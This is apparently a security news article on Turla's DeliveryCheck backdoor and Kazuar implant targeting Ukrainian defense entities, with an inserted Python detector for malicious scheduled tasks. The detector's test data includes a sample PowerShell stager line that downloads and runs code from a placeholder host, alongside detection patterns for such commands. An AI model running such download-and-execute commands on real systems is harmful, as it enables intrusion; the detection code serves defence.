Backdoor Malware Used Against Ukrainian Defense Entities


A new .NET-based backdoor, named DeliveryCheck (also known as CAPIBAR or GAMEDAY), has been identified, specifically targeting the defense sector in Ukraine and Eastern Europe. The backdoor is also capable of delivering follow-on payloads.

The attacks have been attributed to a Russian nation-state actor called Turla, which is tracked under various names including Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug. Turla is known to be linked to Russia's Federal Security Service (FSB). The attack vector involves distributing DeliveryCheck via email, using documents containing malicious macros. Once a host is compromised, DeliveryCheck persists through a scheduled task, which downloads and executes it in memory. It then communicates with a command-and-control (C2) server to retrieve tasks, including launching arbitrary payloads embedded in XSLT stylesheets.
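As an added example (not code from the article or from any vendor report), the following Python check is one a defender could run over exported Task Scheduler XML to flag tasks whose action launches PowerShell with a download-and-execute-in-memory pattern of the kind described above. The heuristic patterns, the sample task definitions and the placeholder URL are constructed assumptions, not indicators from the article.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (what "schtasks /query /xml" exports).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed, generic heuristics for a download-and-run-in-memory action.
PATTERNS = {
    "powershell": r"powershell(\.exe)?\b",
    "encoded": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
    "iex": r"\biex\b|invoke-expression",
    "hidden": r"-w(indowstyle)?\s+hidden",
    "in-memory": r"frombase64string|reflection\.assembly\]::load",
}
COMPILED = {k: re.compile(v, re.IGNORECASE) for k, v in PATTERNS.items()}

def exec_actions(task_xml: str) -> list[tuple[str, str]]:
    """Return (Command, Arguments) for each <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    return [
        (e.findtext("t:Command", "", NS).strip(), e.findtext("t:Arguments", "", NS).strip())
        for e in root.findall(".//t:Actions/t:Exec", NS)
    ]

def suspicious_indicators(task_xml: str) -> set[str]:
    """Names of the heuristics that match any action of the task."""
    hits = set()
    for cmd, args in exec_actions(task_xml):
        text = f"{cmd} {args}"
        hits.update(name for name, rx in COMPILED.items() if rx.search(text))
    return hits

def is_suspicious(task_xml: str) -> bool:
    """Flag when PowerShell is launched together with a download/decode pattern."""
    hits = suspicious_indicators(task_xml)
    return "powershell" in hits and bool(hits & {"download", "iex", "in-memory", "encoded"})

def _task(cmd: str, args: str) -> str:  # constructed sample, not a real export
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f'<Actions Context="Author"><Exec><Command>{cmd}</Command>'
        f"<Arguments>{args}</Arguments></Exec></Actions></Task>"
    )

BENIGN = _task(r"C:\Windows\System32\cleanmgr.exe", "/autoclean")
STAGER = _task("powershell.exe",
               "-NoP -W Hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"")

if __name__ == "__main__":
    for label, xml in (("benign", BENIGN), ("stager", STAGER)):
        print(label, sorted(suspicious_indicators(xml)), is_suspicious(xml))
```

On a live host, feed it the output of `schtasks /query /xml /tn <task>` for each task and review flagged entries alongside the task's author and creation time.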

Initial Attack Uses Kazuar Implant

In some instances, the initial access is accompanied by the distribution of a known Turla implant, Kazuar. This implant is well-equipped to steal application configuration files, event logs, and various data from web browsers. The main objective of these attacks is to exfiltrate messages from the Signal messaging app on Windows, enabling the adversaries to access sensitive conversations, documents, and images on the targeted systems.

A significant aspect of DeliveryCheck is its ability to compromise Microsoft Exchange servers by installing a server-side component using PowerShell Desired State Configuration (DSC), a platform that facilitates the automated configuration of Windows systems. DSC is used to generate a Managed Object Format (MOF) file containing a PowerShell script that loads the embedded .NET payload into memory, effectively turning a legitimate server into a malicious C2 center.

Ukraine Takes Down Propaganda Bot Farm

In parallel, the Cyber Police of Ukraine successfully dismantled a large-scale bot farm, implicating more than 100 individuals engaged in spreading hostile propaganda justifying the Russian invasion. The group was also involved in leaking personal information belonging to Ukrainian citizens and executing various fraud schemes. As part of this operation, searches were conducted in 21 locations, resulting in the seizure of computer equipment, mobile phones, over 250 GSM gateways, and about 150,000 SIM cards belonging to different mobile operators.

July 20, 2023